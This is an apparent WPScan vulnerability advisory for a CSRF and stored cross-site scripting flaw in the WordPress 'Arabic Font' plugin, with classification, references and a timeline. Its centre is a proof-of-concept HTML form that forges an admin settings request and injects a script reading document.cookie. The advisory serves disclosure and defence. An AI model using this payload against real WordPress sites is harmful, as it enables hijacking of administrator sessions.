Arabic Font - CSRF & Stored XSS

Sign up to our free email alerts service for instant vulnerability notifications!

Description
Due to a lack of CSRF mitigation and entity encoding in the output generated by arabic-font.php and /inc/panel.php, it is possible to store and execute scripts in the context of an admin user.
Proof of Concept
<form method="post" action="http://[target]/wp-admin/admin.php?page=arabic-font%2Finc%2Finit.php">  
  <input type="hidden" name="save1" value="Save changes">
  <input type="hidden" name="AF_fontfamily" value="JF Flat Jozoor">
  <input type="hidden" name="AF_fontsize" value="18">
  <input type="hidden" name="AF_lineheight" value="45">
  <input type="hidden" name="AF_textalign" value="Center">
  <input type="hidden" name="AF_defaultcssclass" value=".arab&quot;&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;&lt;input+type=&quot;hidden&quot;+value=&quot;">
  <input type="hidden" name="AF_customcss" value="">
  <input type="hidden" name="action" value="save">
  <input type="submit" value="Drink all the booze, hack all the things.">
</form>

Affects

Plugin arabic-font

References

URL https://www.rastating.com/arabic-font-1-2-csrf-stored-xss/

Classification

Type XSS
OWASP Top 10 A3: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Submitter rastating
Submitter Website https://www.rastating.com/
Submitter Twitter @iamrastating
Views 49
Verified No
WPVDB ID 8868

Timeline

Publicly Published 2017-07-20 (about 1 month ago)
Added 2017-07-21 (about 1 month ago)
Last Updated 2017-07-21 (about 1 month ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.